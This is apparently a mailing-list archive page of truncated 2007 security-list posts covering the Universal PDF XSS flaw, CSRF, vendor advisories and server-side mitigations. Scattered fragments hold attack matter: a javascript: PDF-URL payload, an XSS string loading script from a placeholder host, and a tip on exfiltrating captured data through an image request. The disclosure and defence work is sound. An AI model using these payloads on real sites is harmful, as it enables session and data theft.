I'm most worried about the CSRF vector.
XSS attacks are easily preventable via a web app firewall, input
validation and/or session ID rotation; and I see a lot of frameworks
(like Drupal 4.7.4+) protect against CSRF via Form Keys and/or rotating
sessions. But I do not see a lot of custom
CALL FOR PAPERS
RAID 2007
10th International Symposium on
Recent Advances in Intrusion Detection 2007
September 5-7, 2007
Crowne
-- Forwarded message --
Date: Wed, 3 Jan 2007 20:11:34 -0600 (CST)
From: Gadi Evron [EMAIL PROTECTED]
To: funsec@linuxbox.org
Subject: [funsec] AV and Marketing Babes
We discussed NOD32's marketing with putting NOD32 protects your ass on
babes while playing sports (!!!) -
Sent to the wrong place sorry.
On 1/4/07, Am Razak [EMAIL PROTECTED] wrote:
Checked Google page
it says that entire URL will be transmitted to Google. If the site
authentication is posted on the URL, it will be captured by google.
GOOGLE SAYS..
12. What information is sent to
And the related OpenOffice Issue 70042 document opened on 2nd Oct is located at
http://www.openoffice.org/issues/show_bug.cgi?id=70042
These issues are fixed in version 2.1.
- Juha-Matti
Juha-Matti Laurio [EMAIL PROTECTED] wrote:
It appears that OpenOffice.org has issued a patch for WMF/EMF
Dear List,
Did anybody mention this does not work in Adobe Acrobat Reader 8 ?
--
http://secdev.zoller.lu
Thierry Zoller
Fingerprint : 5D84 BFDC CD36 A951 2C45 2E57 28B3 75DD 0AC6 F1C7
___
Full-Disclosure - We believe in it.
Charter:
Dear List,
Kevin Finisterre and myself gave a Talk in Berlin 29th on Bluetooth
Hacking, we presented new implementation bugs as well as bugs/problems
deeply buried within the Protocol itself.
This mail to the list should represent a digest for those not able to
attend or able to view the stream.
According to public reports, this vulnerability is addressed in Adobe
Acrobat Reader 8.0.
I've actually tested it. On Reader 8 Acrobat you get a messagebox that
says This operation is not allowed
Larry Seltzer
eWEEK.com Security Center Editor
http://security.eweek.com/
Hi,
As the server side solution, force rewriting fragment identifiers in URI by
redirection response can be considered.
Disallow direct access to PDF on the server and return response such as:
--
Location: http://example.com/one-shot-url.pdf#top
--
As a result, fragment identifiers in URI
Additionally, the public PoC doesn't work on Preview version 3.0.8 (409) on OS
X 10.4.8.
- Juha-Matti
Larry Seltzer [EMAIL PROTECTED] wrote:
According to public reports, this vulnerability is addressed in Adobe
Acrobat Reader 8.0.
I've actually tested it. On Reader 8 Acrobat you get a
LS-20061102
LSsec has discovered a vulnerability in Business Objects Crystal Reports XI
Professional, which could be exploited by an attacker in order to execute
arbitrary
code on an affected system. Exploitation requires that the attacker coerce the
target user into opening a malicious .RPT
file:///C:/Program Files/Adobe/Acrobat
6.0/Resource/ENUtxt.pdf#something=javascript:function
cXHR(){try{return new ActiveXObject('Msxml2.XMLHTTP');}catch(e){}try{return
new ActiveXObject('Microsoft.XMLHTTP');}catch(e){}try{return new
XMLHttpRequest();}catch(e){} return null;}var xhr =
Hello All,
I'm trying to find methodology for implementing intrusion prevention system
in my report. I'm reading about an improvement for system development life
cycle for information security. But it's really complicated for just a guide
how to implement intrusion prevention. Maybe someone
Shows up in a log like this:
127.0.0.1 - - [04/Jan/2007:10:57:03 -0500] GET
This input is literally weeks late, but I'm making the effort anyway.
To anyone on this list that actually knows me, I'd like to throw
in my personal encouragement to participate in Doctor/Professor/Mr.
Holt's research study. I know the guy personally. He's been to at
least one party at the
On Thu, 04 Jan 2007 23:01:42 +0700, Fajar Edisya Putera said:
I'm trying to find methodology for implementing intrusion prevention system
in my report. I'm reading about an improvement for system development life
cycle for information security. But it's really complicated for just a guide
how
DMA[2007-0104a] - 'iLife iPhoto Photocasting Format String Vulnerability'
Author: Kevin Finisterre
Vendor(s): http://www.apple.com
Product: 'iLife 06 (?)'
References:
http://www.digitalmunition.com/DMA[2007-0104a].txt
http://www.apple.com/ilife/iphoto/features/photocasting.html
Everybody knows about it. Everybody talks about it. We had a nice
party. It is time for estimating the damages. In this article I will
try to show the impact of the Universal PDF XSS vulnerability by
explaining how it can be used in real life situations.
I'm trying to put together a demonstration of this vulnerability, and how it
could affect corporate security, however I'm encountering a large hangup
when sending a file 'back' to the webserver, the browser same origin policy
denies me the ability to send files to a different domain, which afaik
Last night I came up with a proof of concept to exploit this locally:
http://ha.ckers.org/blog/20070103/pdf-xss-can-compromise-your-machine/
If you have Adobe 7.0 installed there is at least one standard PDF
installed on the local drive. Ouch.
-RSnake
http://ha.ckers.org/
hello everybody,
recently, i've detected that gmx, a german freemail-provider (it offers
professional services too) is prone to a xss-vulnerability.
An attacker could send an email containing this string:
/textareascript src=http://somedomain.tld/somefile.js;
type=text/javascript
Because
We need to force the users to download the PDF files
And we can add the following code to the httpd.conf or .htaccess
SetEnvIf Request_URI \.pdf$ requested_pdf=pdf
Header add Content-Disposition Attachment env=requested_pdf
Another solution is to protect our PDF files from external links (hotlinking)
Hi dear list,
usual politeness
Happy new year, etc... ;)
/usual politeness
I have apparently not attended any talk (besides those on RFID) Gadi did...
Technically speaking, the best talks I have seen (security wise) were :
* Unusual bugs by Ilja :
12. What information is sent to Google when I enable the Enhanced
Protection Feature?
When enabled, the entire URL of the site that you're visiting will be
securely transmitted to Google for evaluation. In addition, a very condensed
version of the page's content may be sent to compare
If I recall correctly from the Content-Disposition HTML attachment
handling vulnerabilities last year, Opera didn't reliably abide by the
Content-Disposition header.
Additionally, Content-Disposition support in IE, Firefox, Opera,
Safari and a few others was extremely inconsistent from version to
Be careful using either of those. REQUEST_URI can contain anything:
http://example.com/file.pdf?whatever#vectorgoeshere
For that example the request URI will be ..pathto..file.pdf?whatever
which does not match \.pdf$. Likewise the second one has issues,
including the fact that referrers are
===
Ubuntu Security Notice USN-398-3 January 04, 2007
firefox-themes-ubuntu regression
https://launchpad.net/bugs/76871
===
A security issue affects the following Ubuntu
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200701-02
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - -
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200701-03
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - -
A while ago, apparently angry with Larry Seltzer, I penned a quick
write-up on the possible issues with race conditions triggered by
asynchronous browser events (such as JavaScript timers) colliding with
synchronous content rendering:
http://seclists.org/vulnwatch/2006/q3/0023.html
This is in
A website that I am developing has had BackDoor-CUS!php uploaded to the
images directory. My fault entirely due to permissions set.
This has resulted in
html
script language=javascript
I hope you're still not angry!
I just tried your demo on IE7. It took a while longer but does seem to
have locked up. Were you looking at IE6 or IE7, and is the behavior any
different?
Larry Seltzer
eWEEK.com Security Center Editor
http://security.eweek.com/
On Thu, 4 Jan 2007, Larry Seltzer wrote:
I hope you're still not angry!
It took months of therapy, but I recovered ;)
I just tried your demo on IE7. It took a while longer but does seem to
have locked up. Were you looking at IE6 or IE7, and is the behavior any
different?
I tested several
Well, that sure was informative.
My questions to what the advisory means are below. Can anyone answer or
correct this at all?
On 1/3/07, Cisco Systems Product Security Incident Response Team wrote:
Details
===
Unchangeable Shared Secret
+-
In order for Cisco
===
Ubuntu Security Notice USN-401-1 January 04, 2007
dbus vulnerability
CVE-2006-6107
===
A security issue affects the following Ubuntu releases:
Ubuntu 5.10
Ubuntu 6.06
I just skimmed through your code very quickly and I noticed a single
problem. Don't send the captured data with another XHR (xhr2). Use
images.
var img = new Image()
img.src = url;
this should work.
On 1/4/07, T Biehn [EMAIL PROTECTED] wrote:
I'm trying to put together a demonstration of this
On 04 Jan 07, at 13:37, Ian Shaw wrote:
A website that I am developing has had BackDoor-CUS!php uploaded to
the images directory. My fault entirely due to permissions set.
This has resulted in
html
script language=javascript
===
Ubuntu Security Notice USN-400-1 January 04, 2007
mozilla-thunderbird vulnerabilities
CVE-2006-6497, CVE-2006-6498, CVE-2006-6499, CVE-2006-6501,
CVE-2006-6502, CVE-2006-6503, CVE-2006-6505
Andrew Farmer wrote:
All files are available on request, if anyone's interested in doing
some further analysis of their own.
That was fun :)
hi andrew, the main page tries to load three different exploits:
- a variant of Java/ClassLoader (the applet)
- Internet Explorer (MDAC) Remote Code